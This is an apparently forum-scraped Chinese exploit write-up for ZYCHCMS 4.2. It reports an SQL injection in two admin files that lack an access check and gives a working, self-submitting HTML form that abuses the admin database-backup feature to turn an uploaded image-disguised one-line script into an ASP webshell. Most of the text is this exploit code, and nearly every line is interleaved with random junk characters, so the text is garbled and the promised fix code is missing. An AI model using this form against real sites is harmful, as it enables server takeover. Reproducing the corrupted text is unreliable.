7 \/ ^' Y5 y, H8 n+ S
1 J% l4 Q4 [5 E4 Y" ?! c. H& e4 L% B
0 @& ^. T, m. [ o& M# i Z" i' T* ]+ F2 f1 X8 j! p# g9 m
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
5 g5 Y' w7 i: A! B ①SQL注射漏洞
$ |; A. [9 n) [7 ^5 ]0 A9 l, i; e 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
( S5 q! `9 i3 q/ d" D0 M" G2 N- u' M' W 漏洞原因:未过滤
' O# R5 m+ p" h' ] 漏洞代码:
9 G$ D) a, \& T" |2 h 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
& m3 a/ i1 V5 L: h 修复方法:在文件开头加入代码
# p: g4 d" s' X9 g# p0 Z# P3 i. l
0 Y% c0 N, h8 [5 m7 M0 `5 f0 t4 n2 L1 g
②后台拿WBSHELL A" |* f: W' P+ F1 I0 m
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。0 o0 P5 g* G1 d* W1 ^% j# g
这里在网上找了一个,改了下,将就着用。% O/ h9 j V. q7 n9 I" N6 J
以下是代码本地提交代码
/ F+ A1 L6 x$ F2 X! \7 L2 z% f- r - Y( @. K8 v6 _2 B8 Z1 q
0 a$ G7 ^( }- X# y% T% f& i% `; \2 ^3 g
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
( ^" E: N" |" u0 J8 e" _8 B9 x, ?! _% L <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
}- E" g3 U; z- `. Z! D% W <tr>
, F; {8 C% L0 P9 L$ i <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 c( F- j, T: g$ {$ K$ Z2 Y6 X
</tr>' q( f& `' I2 r7 j- L( L3 C
<tr>5 v2 X- N2 M' h
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>/ J C5 L v* o( _: m$ _: p+ v( K6 U
</span>
, R0 }; K9 I, B0 k. h& ^2 y <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
0 J% [, `; }6 L <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >- r( k) r- n! K: i
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td># I: [" \# i! y: Q9 o# @
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
& Y" z" I5 E S0 t4 a <div align=”left”>
8 i- p7 H( c$ @ <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
) H& Q! k+ c$ S7 o6 L! R <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
9 S. K: j8 v' f <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” /># [4 u2 [+ {: H- Y$ U# E' n' a
</div></td> D) s' J0 P9 ^9 n* g
</tr>" c- h3 P/ H, P1 m- j/ [
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>( q$ Y: P' l: J$ W
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>4 @! g& f: N* }
<td class=”td”><div align=”left”>
: u! E" b3 b/ Z8 d$ Z/ `3 { <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />2 P X% R$ l/ q. K1 {
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! I3 x- C2 Q! h- c$ ]) f </tr>
* E7 V+ O: U, P" A& n, i: j8 e <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
y+ W/ }! `" ?2 c) n; v* X" T <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
, B7 H" e4 e: B p* ]' d! u <td class=”td”><div align=”left”>3 d& Z, V3 u ^" P: D
<input type=”submit” value=”确定备份” class=”btn”
z! i; P# k; L* P" C/ [$ y </div></td>: s0 T; o, f+ b. z' `9 D" c1 i# U
</tr>
+ D. p! [8 g, v3 r& K </table></td></tr></form>2 g9 N8 t. o+ f
</table>' k: m+ N) `2 X1 L$ A& Y3 W4 n: `! Q
</td>/ r9 z( T+ r" X) f! s: ?
</tr>1 I, _9 c1 k+ A+ _% |
</table>/ `9 b6 M1 X3 r) e8 g- P/ G* Z$ l
<script> d7 B- i9 \0 ?; v
document.all.add.submit();/ m0 P A" V4 o) p: X
</script>
. a0 ]/ T1 L. [. h/ g
4 ]1 e7 c9 M& x$ R" O. V7 u; y
1 p/ k9 x, T* W* r: ?
6 g2 r9 t1 ?, p# \
( J4 r' X9 g% K( U5 p; s8 |
! E6 ]3 ~8 |/ u3 E1 ?; G. i6 n; [
9 z6 l/ W: s9 m6 ^5 D+ l$ Z! J. p: _; _. L6 M( p9 W3 B- c6 ^, q
' F' R; Q% ]- h k2 A
) C# N( x( @; Q; c1 f( g! s+ w# t: z) U3 E: ^/ A1 \
|